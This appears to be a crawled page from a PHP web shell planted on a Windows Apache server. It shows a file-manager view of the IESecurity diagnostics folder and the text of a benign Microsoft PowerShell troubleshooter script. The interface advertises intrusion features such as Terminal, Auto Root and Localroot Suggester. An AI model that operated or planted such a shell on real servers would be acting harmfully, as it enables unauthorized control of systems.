Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Windows /
diagnostics /
system /
IESecurity /
Delete
Unzip
Name
Size
Permission
Date
Action
en-US
[ DIR ]
drwxrwxrwx
2023-03-23 12:54
pt-BR
[ DIR ]
drwxrwxrwx
2019-12-07 15:53
CL_Utility.ps1
2.4
KB
-rw-rw-rw-
2019-12-07 10:09
DiagPackage.diagpkg
7.31
KB
-rw-rw-rw-
2019-12-07 10:09
DiagPackage.dll
68.5
KB
-rw-rw-rw-
2019-12-07 10:09
IESecurity_TroubleShooter.ps1
268
B
-rw-rw-rw-
2019-12-07 10:09
IEsecuritysettings.ps1
16.25
KB
-rw-rw-rw-
2019-12-07 10:09
RS_Blockpopups.ps1
1.7
KB
-rw-rw-rw-
2019-12-07 10:09
RS_IESecuritylevels.ps1
1.05
KB
-rw-rw-rw-
2019-12-07 10:09
RS_PhishingFilter.ps1
3.12
KB
-rw-rw-rw-
2019-12-07 10:09
TS_Blockpopups.ps1
1.26
KB
-rw-rw-rw-
2019-12-07 10:09
TS_IEsecuritylevels.ps1
2.98
KB
-rw-rw-rw-
2019-12-07 10:09
TS_PhishingFilter.ps1
1.98
KB
-rw-rw-rw-
2019-12-07 10:09
Save
Rename
# Copyright � 2008, Microsoft Corporation. All rights reserved. #Localization Data Import-LocalizedData -BindingVariable localizationString -FileName IESecurity_TroubleShooter . .\CL_Utility.ps1 function CheckPhishingFilter { Write-DiagProgress -activity $localizationString.Check_PhishingFilter [bool]$result = $true $name = "EnabledV9" $registrykey = "Software\Policies\Microsoft\Internet Explorer\PhishingFilter" if((UnderPolicySetting $name $registrykey) -eq $true) { [string]$message = $localizationString.Message_Phishingfilter $message | convertto-xml | Update-DiagReport -rid RC_Phishingfilter -id Message_Phishingfilter -name $localizationString.Report_name_Phishingfilter return $true } $reg_hkcu_path = "Registry::HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter" $reg_hklm_path = "Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\PhishingFilter" if((test-path $reg_hkcu_path) -or (test-path $reg_hklm_path)) { if(test-path $reg_hklm_path) { $IsEnabledproperty = GetItemPropertyValue $reg_hklm_path "EnabledV9" $IsEnabled = $IsEnabledproperty."EnabledV9" $result = -not (($IsEnabled -eq 0) -or ($IsEnabled -eq $null)) } # hkcu overrides the setting in hklm if(test-path $reg_hkcu_path) { $IsEnabledproperty = GetItemPropertyValue $reg_hkcu_path "EnabledV9" $IsEnabled = $IsEnabledproperty."EnabledV9" # if hkcu value is present, use it if($IsEnabled -ne $null) { $result = -not ($IsEnabled -eq 0) } } } else { $result = $false } return $result } if((CheckPhishingFilter) -eq $false) { Update-DiagRootCause -id RC_Phishingfilter -Detected $true } else { Update-DiagRootCause -id RC_Phishingfilter -Detected $false }